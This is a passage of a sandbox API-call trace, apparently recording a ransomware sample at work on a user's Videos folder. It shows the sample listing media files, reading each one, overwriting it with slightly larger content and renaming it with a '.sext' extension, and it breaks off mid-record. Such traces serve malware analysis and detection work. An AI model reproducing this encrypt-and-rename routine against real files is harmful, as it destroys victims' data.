[0092.717] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", lpFilePart=0x0) returned 0x35 [0092.717] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.717] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wysf8apsc2_k.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.717] GetFileType (hFile=0x320) returned 0x1 [0092.717] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.717] GetFileType (hFile=0x320) returned 0x1 [0092.717] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e6d8 | out: lpFileSizeHigh=0x12e6d8*=0x0) returned 0x13bbc [0092.717] ReadFile (in: hFile=0x320, lpBuffer=0x243d410, nNumberOfBytesToRead=0x13bbc, lpNumberOfBytesRead=0x12e608, lpOverlapped=0x0 | out: lpBuffer=0x243d410*, lpNumberOfBytesRead=0x12e608*=0x13bbc, lpOverlapped=0x0) returned 1 [0092.719] CloseHandle (hObject=0x320) returned 1 [0092.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", nBufferLength=0x105, lpBuffer=0x12e060, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", lpFilePart=0x0) returned 0x35 [0092.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e540) returned 1 [0092.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wysf8apsc2_k.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.919] GetFileType (hFile=0x320) returned 0x1 [0092.919] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4b0) returned 1 [0092.919] GetFileType (hFile=0x320) returned 0x1 [0092.919] WriteFile (in: hFile=0x320, lpBuffer=0x235d898*, nNumberOfBytesToWrite=0x13bc0, lpNumberOfBytesWritten=0x12e668, lpOverlapped=0x0 | out: lpBuffer=0x235d898*, lpNumberOfBytesWritten=0x12e668*=0x13bc0, lpOverlapped=0x0) returned 1 [0092.921] CloseHandle (hObject=0x320) returned 1 [0092.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf", lpFilePart=0x0) returned 0x35 [0092.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf.sext", nBufferLength=0x105, lpBuffer=0x12e200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf.sext", lpFilePart=0x0) returned 0x3a [0092.923] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e640) returned 1 [0092.923] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wysf8apsc2_k.swf"), fInfoLevelId=0x0, lpFileInformation=0x12e720 | out: lpFileInformation=0x12e720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x841fb3a0, ftCreationTime.dwHighDateTime=0x1d5df9c, ftLastAccessTime.dwLowDateTime=0xbd4bfc40, ftLastAccessTime.dwHighDateTime=0x1d5dc47, ftLastWriteTime.dwLowDateTime=0x85b759e0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x13bc0)) returned 1 [0092.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e600) returned 1 [0092.923] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wysf8apsc2_k.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wysf8ApsC2_k.swf.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wysf8apsc2_k.swf.sext")) returned 1 [0092.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e610) returned 1 [0092.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY", nBufferLength=0x105, lpBuffer=0x12e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY", lpFilePart=0x0) returned 0x29 [0092.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\", lpFilePart=0x0) returned 0x2a [0092.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\*", lpFindFileData=0x12e2b0 | out: lpFindFileData=0x12e2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0092.925] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.925] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3b60630, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x5f7a8ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a2, ftLastWriteTime.dwLowDateTime=0x5f7a8ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a2, nFileSizeHigh=0x0, nFileSizeLow=0x758b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CkzJcwF-T_AwbraA4MWA.avi", cAlternateFileName="CKZJCW~1.AVI")) returned 1 [0092.925] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b01530, ftCreationTime.dwHighDateTime=0x1d5dc65, ftLastAccessTime.dwLowDateTime=0xc673a4c0, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0xc673a4c0, ftLastWriteTime.dwHighDateTime=0x1d5e364, nFileSizeHigh=0x0, nFileSizeLow=0x66c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DCo-xn7gs6510.avi", cAlternateFileName="DCO-XN~1.AVI")) returned 1 [0092.925] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9df5a50, ftCreationTime.dwHighDateTime=0x1d5e6f9, ftLastAccessTime.dwLowDateTime=0x3f109890, ftLastAccessTime.dwHighDateTime=0x1d5d8ff, ftLastWriteTime.dwLowDateTime=0x3f109890, ftLastWriteTime.dwHighDateTime=0x1d5d8ff, nFileSizeHigh=0x0, nFileSizeLow=0x610b, dwReserved0=0x0, dwReserved1=0x0, cFileName="fcA9qJGasA7F1CNxnX.mp4", cAlternateFileName="FCA9QJ~1.MP4")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x543cb8c0, ftCreationTime.dwHighDateTime=0x1d5de3b, ftLastAccessTime.dwLowDateTime=0x8dc508c0, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x8dc508c0, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x10073, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQ4WV4Rq8zyb.swf", cAlternateFileName="FQ4WV4~1.SWF")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d32d40, ftCreationTime.dwHighDateTime=0x1d5e346, ftLastAccessTime.dwLowDateTime=0x4bffbe60, ftLastAccessTime.dwHighDateTime=0x1d5e0e2, ftLastWriteTime.dwLowDateTime=0x4bffbe60, ftLastWriteTime.dwHighDateTime=0x1d5e0e2, nFileSizeHigh=0x0, nFileSizeLow=0x931, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr0mD.flv", cAlternateFileName="")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd56b60, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0xe2bc5a70, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0xe2bc5a70, ftLastWriteTime.dwHighDateTime=0x1d5de12, nFileSizeHigh=0x0, nFileSizeLow=0x2d67, dwReserved0=0x0, dwReserved1=0x0, cFileName="FY4730gbBQhrVa J.avi", cAlternateFileName="FY4730~1.AVI")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HAE _NkXT9aKwYO", cAlternateFileName="HAE_NK~1")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd763b10, ftCreationTime.dwHighDateTime=0x1d5dbe7, ftLastAccessTime.dwLowDateTime=0x7008a50, ftLastAccessTime.dwHighDateTime=0x1d5e002, ftLastWriteTime.dwLowDateTime=0x7008a50, ftLastWriteTime.dwHighDateTime=0x1d5e002, nFileSizeHigh=0x0, nFileSizeLow=0x16a07, dwReserved0=0x0, dwReserved1=0x0, cFileName="kMyC.mkv", cAlternateFileName="")) returned 1 [0092.926] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d06c0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0x4e999fc0, ftLastAccessTime.dwHighDateTime=0x1d5e32a, ftLastWriteTime.dwLowDateTime=0x4e999fc0, ftLastWriteTime.dwHighDateTime=0x1d5e32a, nFileSizeHigh=0x0, nFileSizeLow=0x1310a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NE-be6HdLUpf4N04.swf", cAlternateFileName="NE-BE6~1.SWF")) returned 1 [0092.927] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0092.927] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0092.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e560) returned 1 [0092.927] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e520) returned 1 [0092.927] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e610) returned 1 [0092.927] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY", nBufferLength=0x105, lpBuffer=0x12e100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY", lpFilePart=0x0) returned 0x29 [0092.927] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\", lpFilePart=0x0) returned 0x2a [0092.927] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\*", lpFindFileData=0x12e2b0 | out: lpFindFileData=0x12e2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xae39b0 [0092.928] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc0847190, ftCreationTime.dwHighDateTime=0x1d5e092, ftLastAccessTime.dwLowDateTime=0x80943be0, ftLastAccessTime.dwHighDateTime=0x1d5e0ad, ftLastWriteTime.dwLowDateTime=0x80943be0, ftLastWriteTime.dwHighDateTime=0x1d5e0ad, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.928] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3b60630, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x5f7a8ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a2, ftLastWriteTime.dwLowDateTime=0x5f7a8ec0, ftLastWriteTime.dwHighDateTime=0x1d5e4a2, nFileSizeHigh=0x0, nFileSizeLow=0x758b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CkzJcwF-T_AwbraA4MWA.avi", cAlternateFileName="CKZJCW~1.AVI")) returned 1 [0092.928] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb9b01530, ftCreationTime.dwHighDateTime=0x1d5dc65, ftLastAccessTime.dwLowDateTime=0xc673a4c0, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0xc673a4c0, ftLastWriteTime.dwHighDateTime=0x1d5e364, nFileSizeHigh=0x0, nFileSizeLow=0x66c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DCo-xn7gs6510.avi", cAlternateFileName="DCO-XN~1.AVI")) returned 1 [0092.928] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9df5a50, ftCreationTime.dwHighDateTime=0x1d5e6f9, ftLastAccessTime.dwLowDateTime=0x3f109890, ftLastAccessTime.dwHighDateTime=0x1d5d8ff, ftLastWriteTime.dwLowDateTime=0x3f109890, ftLastWriteTime.dwHighDateTime=0x1d5d8ff, nFileSizeHigh=0x0, nFileSizeLow=0x610b, dwReserved0=0x0, dwReserved1=0x0, cFileName="fcA9qJGasA7F1CNxnX.mp4", cAlternateFileName="FCA9QJ~1.MP4")) returned 1 [0092.928] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x543cb8c0, ftCreationTime.dwHighDateTime=0x1d5de3b, ftLastAccessTime.dwLowDateTime=0x8dc508c0, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x8dc508c0, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x10073, dwReserved0=0x0, dwReserved1=0x0, cFileName="FQ4WV4Rq8zyb.swf", cAlternateFileName="FQ4WV4~1.SWF")) returned 1 [0092.929] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9d32d40, ftCreationTime.dwHighDateTime=0x1d5e346, ftLastAccessTime.dwLowDateTime=0x4bffbe60, ftLastAccessTime.dwHighDateTime=0x1d5e0e2, ftLastWriteTime.dwLowDateTime=0x4bffbe60, ftLastWriteTime.dwHighDateTime=0x1d5e0e2, nFileSizeHigh=0x0, nFileSizeLow=0x931, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr0mD.flv", cAlternateFileName="")) returned 1 [0092.929] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fd56b60, ftCreationTime.dwHighDateTime=0x1d5dc36, ftLastAccessTime.dwLowDateTime=0xe2bc5a70, ftLastAccessTime.dwHighDateTime=0x1d5de12, ftLastWriteTime.dwLowDateTime=0xe2bc5a70, ftLastWriteTime.dwHighDateTime=0x1d5de12, nFileSizeHigh=0x0, nFileSizeLow=0x2d67, dwReserved0=0x0, dwReserved1=0x0, cFileName="FY4730gbBQhrVa J.avi", cAlternateFileName="FY4730~1.AVI")) returned 1 [0092.929] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x93aec150, ftCreationTime.dwHighDateTime=0x1d5d98c, ftLastAccessTime.dwLowDateTime=0xfdce7020, ftLastAccessTime.dwHighDateTime=0x1d5defb, ftLastWriteTime.dwLowDateTime=0xfdce7020, ftLastWriteTime.dwHighDateTime=0x1d5defb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HAE _NkXT9aKwYO", cAlternateFileName="HAE_NK~1")) returned 1 [0092.929] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd763b10, ftCreationTime.dwHighDateTime=0x1d5dbe7, ftLastAccessTime.dwLowDateTime=0x7008a50, ftLastAccessTime.dwHighDateTime=0x1d5e002, ftLastWriteTime.dwLowDateTime=0x7008a50, ftLastWriteTime.dwHighDateTime=0x1d5e002, nFileSizeHigh=0x0, nFileSizeLow=0x16a07, dwReserved0=0x0, dwReserved1=0x0, cFileName="kMyC.mkv", cAlternateFileName="")) returned 1 [0092.929] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d06c0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0x4e999fc0, ftLastAccessTime.dwHighDateTime=0x1d5e32a, ftLastWriteTime.dwLowDateTime=0x4e999fc0, ftLastWriteTime.dwHighDateTime=0x1d5e32a, nFileSizeHigh=0x0, nFileSizeLow=0x1310a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NE-be6HdLUpf4N04.swf", cAlternateFileName="NE-BE6~1.SWF")) returned 1 [0092.930] FindNextFileW (in: hFindFile=0xae39b0, lpFindFileData=0x12e300 | out: lpFindFileData=0x12e300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa07d06c0, ftCreationTime.dwHighDateTime=0x1d5e3e2, ftLastAccessTime.dwLowDateTime=0x4e999fc0, ftLastAccessTime.dwHighDateTime=0x1d5e32a, ftLastWriteTime.dwLowDateTime=0x4e999fc0, ftLastWriteTime.dwHighDateTime=0x1d5e32a, nFileSizeHigh=0x0, nFileSizeLow=0x1310a, dwReserved0=0x0, dwReserved1=0x0, cFileName="NE-be6HdLUpf4N04.swf", cAlternateFileName="NE-BE6~1.SWF")) returned 0 [0092.930] FindClose (in: hFindFile=0xae39b0 | out: hFindFile=0xae39b0) returned 1 [0092.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e560) returned 1 [0092.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e520) returned 1 [0092.930] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", lpFilePart=0x0) returned 0x42 [0092.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0092.930] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ckzjcwf-t_awbraa4mwa.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0092.930] GetFileType (hFile=0x320) returned 0x1 [0092.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0092.930] GetFileType (hFile=0x320) returned 0x1 [0092.930] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: lpFileSizeHigh=0x12e5e8*=0x0) returned 0x758b [0092.931] ReadFile (in: hFile=0x320, lpBuffer=0x2375098, nNumberOfBytesToRead=0x758b, lpNumberOfBytesRead=0x12e518, lpOverlapped=0x0 | out: lpBuffer=0x2375098*, lpNumberOfBytesRead=0x12e518*=0x758b, lpOverlapped=0x0) returned 1 [0092.932] CloseHandle (hObject=0x320) returned 1 [0093.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", lpFilePart=0x0) returned 0x42 [0093.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0093.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ckzjcwf-t_awbraa4mwa.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0093.004] GetFileType (hFile=0x320) returned 0x1 [0093.004] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0093.004] GetFileType (hFile=0x320) returned 0x1 [0093.004] WriteFile (in: hFile=0x320, lpBuffer=0x2485438*, nNumberOfBytesToWrite=0x7590, lpNumberOfBytesWritten=0x12e578, lpOverlapped=0x0 | out: lpBuffer=0x2485438*, lpNumberOfBytesWritten=0x12e578*=0x7590, lpOverlapped=0x0) returned 1 [0093.005] CloseHandle (hObject=0x320) returned 1 [0093.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi", lpFilePart=0x0) returned 0x42 [0093.007] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi.sext", nBufferLength=0x105, lpBuffer=0x12e110, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi.sext", lpFilePart=0x0) returned 0x47 [0093.007] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e550) returned 1 [0093.007] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ckzjcwf-t_awbraa4mwa.avi"), fInfoLevelId=0x0, lpFileInformation=0x12e630 | out: lpFileInformation=0x12e630*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3b60630, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x5f7a8ec0, ftLastAccessTime.dwHighDateTime=0x1d5e4a2, ftLastWriteTime.dwLowDateTime=0x85c340c0, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x7590)) returned 1 [0093.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e510) returned 1 [0093.007] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ckzjcwf-t_awbraa4mwa.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\CkzJcwF-T_AwbraA4MWA.avi.sext" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\ckzjcwf-t_awbraa4mwa.avi.sext")) returned 1 [0093.008] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi", lpFilePart=0x0) returned 0x3b [0093.008] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e450) returned 1 [0093.008] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\9ipY\\DCo-xn7gs6510.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\9ipy\\dco-xn7gs6510.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0093.008] GetFileType (hFile=0x320) returned 0x1 [0093.008] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e3c0) returned 1 [0093.008] GetFileType (hFile=0x320) returned 0x1 [0093.008] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x12e5e8 | out: 